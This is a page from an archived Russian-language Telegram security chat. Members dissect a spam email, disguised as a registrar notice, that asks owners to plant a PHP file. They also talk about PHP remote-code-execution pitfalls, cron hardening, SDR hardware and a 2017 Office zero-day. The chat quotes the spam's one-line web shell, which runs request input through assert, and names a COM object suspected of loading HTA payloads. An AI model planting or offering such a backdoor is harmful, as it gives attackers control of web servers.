@DC7499

Страница 651 из 1477
napster
11.04.2017
08:29:22
ачуметь. спасибо!

Vitaly
11.04.2017
08:29:51
https://haveibeenpwned.com/

Roman
11.04.2017
08:30:32
ему, кажись надо не только бинарное значение pwned/safe))))

Andrey
11.04.2017
09:04:08
Яки дивны спамеры, под регистратора косят: Уважаемый клиент! В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом medved.ru осуществляется лицом, указанным в качестве его администратора. Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a139lrkt12z778j4.php со следующим содержимым: <?php assert (stripslashes( $_REQUEST [R01])); ?>

Google
Andrey
11.04.2017
09:04:27
и спам от r01.tech

MERRON
11.04.2017
09:05:40
https://leakedsource.ru
что-то подозрительно

Журналист Bleeping Computer Каталин Кимпану обнаружил на одном из подпольных форумов информацию о сайте LeakedSource, который был заново запущен в доменной зоне .ru. На самом LeakedSource.ru указано, что данный веб-ресурс – это продолжение оригинальной версии. По словам администраторов сайта, они сменили провайдера и регистратора доменных имен. В то же время была утрачена часть контента и потерян доступ к старым серверам и доменам. Как утверждает Кимпану, LeakedSource.ru не является фишинговым и на самом деле дает доступ к утекшей информации.

User
11.04.2017
09:09:50
<?php assert (stripslashes( $_REQUEST [R01])); ?>

а где здесь бекдор?

(сто лет не пиал на php)

Alex
11.04.2017
09:10:17
assert == eval

User
11.04.2017
09:10:45
ебанись, вообще не очевидно

во всех яп что я видел assert это assert -- проверяет условие и кидает исключение если false

User
11.04.2017
09:12:55
ну в питоне такое бай дизайн невозможно например

MERRON
11.04.2017
09:13:18
https://habrahabr.ru/post/138443/

Google
Andrey
11.04.2017
09:13:23
ща пособираем команды, чо они там в request слать будут

User
11.04.2017
09:13:56
в этом php-шном коде assert-у в кач-ве аргумента передается строка, интересно какой ебанат дизайнивший язык додумался ее eval-ить

по-хорошему та версия php которая идет в пакетной базе продакшн дистров вообще должна быть запатчена что бы там вообще не было возможности вызвать assert, eval или другое опасное говно

Alex
11.04.2017
09:18:23
Ну в питоне 2.x была подобная фича с raw_input()

Andrey
11.04.2017
09:18:23
»2. В production environment опция assert.active выключена и аргумент ассерта не вычисляется => злоумышленник ничего не получит.

MERRON
11.04.2017
09:20:03
http://www.rafayhackingarticles.net/2014/08/remote-code-execution-in-php-explained.html http://www.rafayhackingarticles.net/2014/09/indepth-code-execution-in-php-part-two.html 1000 и 1 способ рце в пхп %)

User
11.04.2017
09:20:24
> @Qwerty100500 Ну в питоне 2.x была подобная фича с raw_input() это не так страшно, raw_input подразумевает консольное приложение которое ты ручками запускаешь из командной строки, гипотетический сценарий rce здесь тяжело придумать

а в сферической вебной аппликухе в вакууме raw_input() никто использовать не будет потому что нафига он там

Alex
11.04.2017
09:22:46
Меня больше "радует" ключ /e в preg_replace

MERRON
11.04.2017
09:24:52
но да, это было "гениально"

Aleksandr
11.04.2017
09:32:39
Привет. посоветуйте. мн нужна крон такска, которая будет выполнять скрипт. при этом, с учетом того, что это деньги 1. возможно ли как-то усложнить возможность редактирования крона (как минимум отключение моей таски и добавление новой) 2. засекурить скрипт сам от модификации. все это на случай компрометации и получения доступа к серверу. ну хотя бы от обычного пользователя, от рута не спастись в целом...

User
11.04.2017
09:34:24
/etc/crontab и так не доступен на редактирование юзеру

т.е. -- твоя просьба не имеет смысла потому что оно из коробки уже так

сделай своему скрипту chmod -w и наслаждайся

Aleksandr
11.04.2017
09:38:00
в целом логично... спасибо)

A
11.04.2017
09:42:11
/etc/crontab и так не доступен на редактирование юзеру
если быть точным, то будет по одному файлу на юзера в /var/spool/cron/crontabs(зависит от дистро, но в основном тут)

Valentin
11.04.2017
09:47:34
Всем привет, есть тут те кто моторлки удачно перепаиваил и все зависимости правилтно ставил?

Совет нуден

shadowsoul
11.04.2017
09:48:02
вопрос херовый, переформулируй с моделью и задачей

Google
Valentin
11.04.2017
09:49:46
Моторолка с118 под осмоком, кто сталкивался с этим? Или может мануале на русском есть более подробные

witn3ss
11.04.2017
09:49:48
какая ирония

shadowsoul
11.04.2017
09:50:06
какая ирония
научи его читать английские маны

User
11.04.2017
09:50:26
а перепаивать их зачем?

User
11.04.2017
09:50:38
фильтра, что-ли?

shadowsoul
11.04.2017
09:50:47
ага

Valentin
11.04.2017
09:51:06
фильтра, что-ли?
Фильтра не в обяз перепаивать чтоли?

witn3ss
11.04.2017
09:51:10
плюс в вики же просто все описано, хоть она и англоязычная

User
11.04.2017
09:51:31
дякую тобi б-же за blade-rd

* rf

shadowsoul
11.04.2017
09:51:53
дякую тобi б-же за blade-rd
https://www.crowdsupply.com/lukas-lao-beyer/freesrp

B200 на другом fpga, наконец-то открытая, радио то же самое, и по цене типа в 420 баксов

witn3ss
11.04.2017
09:52:37
https://habrahabr.ru/post/257631/
но здесь далеко не все, читай https://osmocom.org/projects/baseband/wiki

User
11.04.2017
09:53:00
400 баксов не то что бы сильная экономия если сравнивать с лаймом и блейдом

лайм и так продается чуть ли не по себестоимости железа, сделать такого рода платки существенно дешевле мне кажется уже невозможно

shadowsoul
11.04.2017
09:53:42
лайм - пиздец, разные входы, crosstalk, совершенно непонятные уровни сигнала на передачу

User
11.04.2017
09:53:54
да, наслышан

shadowsoul
11.04.2017
09:53:56
блейд - увы, тоже есть проблемы

Google
shadowsoul
11.04.2017
09:54:10
с лаймом вот есть товарищ которого могу хоть завтра поймать

User
11.04.2017
09:59:42
а что там за проблемы кроме головняков с подключением более крутых часов и своего собственного драйвера (сейчас он, правда, уже всем чем только можно поддерживается)?

да и с часами проблема надуманная, во-первых не такие уж и головняки (хотя не так удобно как у B200, это да), во-вторых TCXO c подстройкой по GPS это в сущности блажь для образовательного/исследовательского использования

shadowsoul
11.04.2017
10:05:38
TCXO печки сами по себе нихера не дешевые

подстройка по gps решается в масштабе 60 баксов на всё

Admin
ERROR: S client not available

User
11.04.2017
10:06:09
и что самое главное -- для education/research purposes не особо нужные

штатные 1 pps часы для B200 стоят кстати чуть ли не в два раза дороже чем сам B200

ClockTamer стоит что-то в районе пару сотен кажется

shadowsoul
11.04.2017
10:09:18
ну так usrp постоянно оверпрайс трёхкратный)

yar1k
11.04.2017
12:37:52
К вопросу о 0-day в ms office word. Может ли это быть коммерческая активность ms? Т.е. не укладываются в планы по переводу людей(продаже) нового офиса и дают команду: "выпускайте кракена". К тому же, пролистав гугл не понял к какому релизу офиса относится уязвимость.

User
11.04.2017
12:38:46
большего бреда относительно 0дей уязвимостей где-либо я еще не слышал

Mikhail
11.04.2017
12:39:21
а PoC то есть? А то все пишут, но нихуя не показывают

User
11.04.2017
12:39:25
из того же разряда что и "ав компании сами пишут вирусы что бы их продукты покупали!"

yar1k
11.04.2017
12:40:06
Я люблю теории заговора и не люблю MS, так звезды сошлись

User
11.04.2017
12:41:47
> @cyberpunkych а PoC то есть? А то все пишут, но нихуя не показывают я не ванга, но насколько я понял уязвимость работает следующим образом

у тебя есть офисный документ который подтягивает HTA application с удаленного URL используя соответствующий функционал соответствующего COM/OLE объекта

HTA application делает всякое зло (потому что может) типа shell.run('calc.exe') и ворд при загрузке этого applicatioin-а показывает соответствующий диалог с предложением разрешить или заблокировать

но проблема в том, что в реальной жизни этот HTA application исполняется до того, как пользователь кликнет в этом диалоге что-либо

короче, как-то так

Google
Fuuss ?
11.04.2017
12:45:27
https://threatpost.ru/0-day_microsoft_office_pod_atakoj/21370/

Евгений
11.04.2017
12:45:30
раз и сразу пок) а поискать?

User
11.04.2017
12:45:45
это мое личное предположние исходя из обрывков инфы которую я встречал в тви

@metacat не, это другое совсем

вектора атак из той презы скорее всего не имеют отнощения к этой конкретной уязвимости

Евгений
11.04.2017
12:48:27
к этой конкретной нет, но думаю можно догадаться...

User
11.04.2017
12:48:41
догадаться что?

это вообще о другом

там описывается три класса багов: десериализация, verb action и dll hijacking в com/ole, не похоже что бы хотя бы один из этих классов имел отношение к этому новому 0дею

кстати, все эти три класса уязвимостей в com/ole были вытоптанны почти в ноль за 2013-2015 года

User
11.04.2017
12:52:17
найти что-то похожее на них в тех компонентах которые шипит сам майкрософт сейчас почти нереально

я думаю что в этом новом эксплойте для загрузки HTA используется COM/OLE объект {3050F5C8-98B5-11CF-BB82-00AA00BDCE0B} и URL передается в него через интерфейс IPersistStream

Vladusha
11.04.2017
13:00:07
Сейчас все побегут тестить))

Но нет, не он

Страница 651 из 1477